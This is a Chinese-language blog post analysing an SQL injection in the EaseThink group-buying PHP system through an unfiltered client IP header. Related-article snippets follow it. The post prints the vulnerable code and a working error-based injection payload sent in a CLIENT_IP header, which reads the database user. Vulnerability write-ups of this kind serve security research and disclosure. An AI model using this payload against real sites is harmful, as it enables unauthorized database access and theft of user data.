易想团购系统通杀SQL注入漏洞分析及利用

最新推荐文章于 2021-08-06 10:51:09 发布
最新推荐文章于 2021-08-06 10:51:09 发布
阅读量772 收藏
点赞数
分类专栏: SQL INJECT

刚打开红黑看到基友写的一个{易想团购系统 最新版 通杀}的文章,看他贴的代码里面有个get_client_ip()函数,哈哈,我猜没过滤,果断下了一套程序。

找到get_client_ip()函数:

// 获取客户端IP地址
function get_client_ip(){
   if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
       $ip = getenv("HTTP_CLIENT_IP");
   else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
       $ip = getenv("HTTP_X_FORWARDED_FOR");
   else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
       $ip = getenv("REMOTE_ADDR");
   else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
       $ip = $_SERVER['REMOTE_ADDR'];
   else
       $ip = "unknown";
   return($ip);
}

果然没过滤,看了下很多地方用到这个函数。

比如:

if($_REQUEST['act'] == 'verify')
{
	$id = intval($_REQUEST['id']);
	$user_info  = $GLOBALS['db']->getRow("select * from ".DB_PREFIX."user where id = ".$id);
	if(!$user_info)
	{
		showErr($GLOBALS['lang']['NO_THIS_USER']);
	}
	$verify = $_REQUEST['code'];
	if($user_info['verify'] == $verify)
	{
		//成功
		$_SESSION['user_info'] = $user_info;
		$GLOBALS['db']->query("update ".DB_PREFIX."user set login_ip = '".get_client_ip()."',login_time= ".get_gmtime().",verify = '',is_effect = 1 where id =".$user_info['id']);
		$GLOBALS['db']->query("update ".DB_PREFIX."mail_list set is_effect = 1 where mail_address ='".$user_info['email']."'");	
		$GLOBALS['db']->query("update ".DB_PREFIX."mobile_list set is_effect = 1 where mobile ='".$user_info['mobile']."'");								
		showSuccess($GLOBALS['lang']['VERIFY_SUCCESS'],0,APP_ROOT."/");
}

团购系统嘛,其实不用看代码,登陆的这些地方必定会用这个函数。

果断的,登陆的时候在http头里面加了个client_ip,值为127′

看图:

报错注入,很简单吧,

exp:

火狐插件增加client_ip头部,对应值为

 and (select * from (select count(*),concat(floor(rand(0)*2),(select user()))a from information_schema.tables group by a)b)#

这套程序用的thinkphp的框架,回头看看有没有代码执行。

代码析构师
关注
专栏目录
易想团购系统1.2版最新版
05-20
最新版易想团购系统1.2版 下载安装后就可以使用
最新易想团购系统通杀SQL注入漏洞分析利用exp
收集盒 Book box
04-20 1007
刚打开红黑看到J8基友写的一个{易想团购系统 最新版 通杀}的文章,看他贴的代码里面有个get_client_ip()函数,哈哈,我猜没过滤,果断下了一套程序。 找到get_client_ip()函数。 // 获取客户端IP地址 function get_client_ip(){ if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTT
易想团购 注入 user.php,易想团购系统通杀SQL注入漏洞分析利用
ぃ妖气ぅ的博客
04-10 280
*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。刚打开红黑看到基友写的一个{易想团购系统 最新版 通杀}的文章,看他贴的代码里面有个get_client_ip()函数,哈哈,我猜没过滤,果断下了一套程序。找到get_client_ip()函数:// 获取客户端IP地址function get_client_ip(){if (get...
易想团购 注入 user.php,易想(easethink)团购系统ajax文件导致SQL注入漏洞
weixin_35713824的博客
04-10 380
发布时间:2013-04-18 关键词:easethink易想团购 ajaxsql注入易想团购管理系统是一套定位中高端市场的团购内容管理系统,能够以最低的成本,最少的人力投入在最短的时间架设一个功能齐全、性能优异、规模庞大并易于维护的网站平台。在注册界面,输入用户名后台会验证用户名是否存在,这里是通过ajax去验证,目前很多程序都会忽略这里的过滤而导致SQL注入。system\libs\user...
易想团购 注入 user.php,易想购物(easethink)存在sql注入漏洞,附利用测试POC
weixin_34556619的博客
04-10 187
漏洞概要缺陷编号:WooYun-2013-022023漏洞标题:易想购物(easethink)存在sql注入漏洞,附利用测试POC相关厂商:易想购物漏洞作者:lxsec提交时间:2013-04-17 15:06公开时间:2013-07-16 15:06漏洞类型:SQL注射漏洞危害等级:中自评Rank:10漏洞状态:未联系到厂商或者厂商积极忽略Tags标签:漏洞详情披露状态:2013-04-17: ...
易想团购系统 1.4.rar
05-24
易想团购管理系统是一套定位中高端市场的团购内容管理系统,能够以最低的成本,最少的人力投入在最短的时间架设一个功能齐全、性能优异、规模庞大并易于维护的网站平台。 易想团购系统 1.4 更新内容: 1.修正...
免费版易想团购系统
05-24
【标题】:“免费版易想团购系统” 在IT行业中,团购系统是一种常见的电子商务平台,它允许用户以集体购买的方式获取商品或服务的折扣。"易想团购系统"是一款专为此目的设计的软件解决方案,尤其值得一提的是,这个...
易想(PHP)团购系统 v1.0.rar
07-09
易想团购系统商业版v1.0 主要功能列表 1. 团购分类:可为团购分类设置从属关联 2. 供应商帐户管理:可为每个供应商设置多个子帐户,用于确认团购券的操作,系统会自动记录xx团购券由xx商户的xx管理员进行操作。 3. ...
易想会员管理营销系统源代码
03-18
易想会员管理营销系统是我司历时两年打造一款B/S结构商业会员系统,技术架构为PHP+MYSQL,系统功能涵盖了会员线上线下一体化、线上电子商务、门店、会员卡、线上线下充值、消费、积分、优惠券等功能,专门为商家或...
易想团购 注入 user.php,最新易想团购系统通杀SQL注入漏洞分析利用exp
weixin_42365898的博客
04-10 169
作者:Seay刚打开红黑看到J8基友写的一个{易想团购系统 最新版 通杀}的文章,看他贴的代码里面有个get_client_ip()函数,哈哈,我猜没过滤,果断下了一套程序。找到get_client_ip()函数。// 获取客户端IP地址function get_client_ip(){if (getenv("HTTP_CLIENT_IP") && strcasecmp(geten...
易想商城系统开源版
10-09
商城系统,代码开源 所有文件带有 .cs文件,某些编译后的dll文件也已成功破解,这个代码仅供大家学习,学理念,学思想,学架构。认真看完代码的,估计水平能上一大截。3分不多,一个评论也就回来了。
易想(easethink)团购系统ajax文件导致SQL注入漏洞
收集盒 Book box
04-20 977
发布时间:2013-04-18  关键词:easethink 易想团购 ajax sql注入 易想团购管理系统是一套定位中高端市场的团购内容管理系统,能够以最低的成本,最少的人力投入在最短的时间架设一个功能齐全、性能优异、规模庞大并易于维护的网站平台。 在注册界面,输入用户名后台会验证用户名是否存在,这里是通过ajax去验证,目前很多程序都会忽略这里的过滤而导致SQL注入
易想团购 注入 user.php,易想团购系统通杀SQL注入漏洞分析利用漏洞预警 -电脑资料...
weixin_28918553的博客
04-10 133
刚打开红黑看到J8基友写的一个{易想团购系统 最新版 通杀}的文章,看他贴的代码里面有个get_client_ip()函数,哈哈,我猜没过滤,果断下了一套程序,找到get_client_ip()函数。// 获取客户端IP地址function get_client_ip(){ if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("H...
ajax漏洞 sql注入,易想团购ajax.php SQL注入分析和Exp漏洞预警 -电脑资料
weixin_29696999的博客
08-06 518
在注册的时候,输入用户名后台会验证用户名是否存在,当然是通过ajax去验证的也就是ajax.php,* 验证会员数据 */ function check_user($field_name,$field_data) { //开始数据验证 $user_data[$field_name] = $field_data; $res = array('status'=>1,'info'=>'',...
易想团购 注入 user.php,PHPCMS 2008 c.php存在referer sql注入及修复方案
weixin_34729012的博客
04-10 283
require './ads/include/common.inc.php';require 'f.php'; //此处为我加入的 防止 referer 攻击的代码,再下面 会介绍 f.php$id = intval($id);$ads = $c_ads->get_info($id);if($ads){$db->query("UPDATE ".DB_PRE."ads SET `cl...
利用CMS漏洞渗透并获取某服务器权限
热门推荐
wodafa的博客
03-14 1万+
在phpmyadmin漏洞利用专题中,我们从多个角度介绍了如何获取webshell并获取服务器权限的案例和情形,但在实际渗透过程中还有一种情况,即服务器上存在phpMyAdmin,且获取了root帐号和密码,但无法执行load_file或者说无法导出webshell到服务器上,在这种情况下就需要充分利用既有CMS漏洞,通过CMS漏洞来获取webshell。目前使用流行架构,特别是一键式部署的系统
2025年软考高级 - 信息系统项目管理师考试备考全攻略
最新发布
11-09
2025年软考高级 - 信息系统项目管理师考试备考全攻略
易想商城系统开源版V3.1深度评测
资源摘要信息:"易想商城系统开源版 v3.1是基于仿照知名电商平台红孩子模式开发的开源电子商务解决方案。它旨在为用户提供一个功能完善、易于使用、可定制性强的B2C电子商务平台。该系统支持商品管理、订单处理、支付...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值